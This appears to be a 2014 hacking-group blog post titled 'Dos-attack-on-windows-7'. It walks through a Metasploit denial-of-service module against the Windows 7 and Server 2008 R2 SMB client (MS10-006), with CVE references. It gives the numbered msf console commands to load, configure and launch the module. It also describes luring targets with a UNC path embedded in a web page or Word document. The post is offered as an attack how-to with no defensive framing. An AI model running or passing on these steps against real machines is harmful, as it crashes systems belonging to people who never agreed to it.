Saturday, May 17, 2014

Dos-attack-on-windows-7

DOS attack on windows-7 using backtrack

Dos-attack-on-windows-7
Dos-attack-on-windows-7


Description:
  This module exploits a denial of service flaw in the Microsoft
  Windows SMB client on Windows 7 and Windows Server 2008 R2. To
  trigger this bug, run this module as a service and forces a
  vulnerabile client to access the IP of this system as an SMB server.
  This can be accomplished by embedding a UNC path
  (\HOST\share\something) into a web page if the target is using
  Internet Explorer, or a Word document otherwise.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-0017
  http://www.osvdb.org/62244
  http://www.microsoft.com/technet/security/bulletin/MS10-006.mspx


Exploit name
ms10_006_negotiate_response_loop

msf > search dos

Dos-attack-on-windows-7




auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
  1. msf > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
  2. msf  auxiliary(ms10_006_negotiate_response_loop) > show options
  3. msf  auxiliary(ms10_006_negotiate_response_loop) > set SRVHOST 192.168.1.
  4. msf  auxiliary(ms10_006_negotiate_response_loop) > exploit


Dos-attack-on-windows-7

© HaCkRhInO-TeaM ! 2014
R0oTx:Sahil_Rai
Dos-attack-on-windows-7
  • Blogger Comments
  • Facebook Comments
Top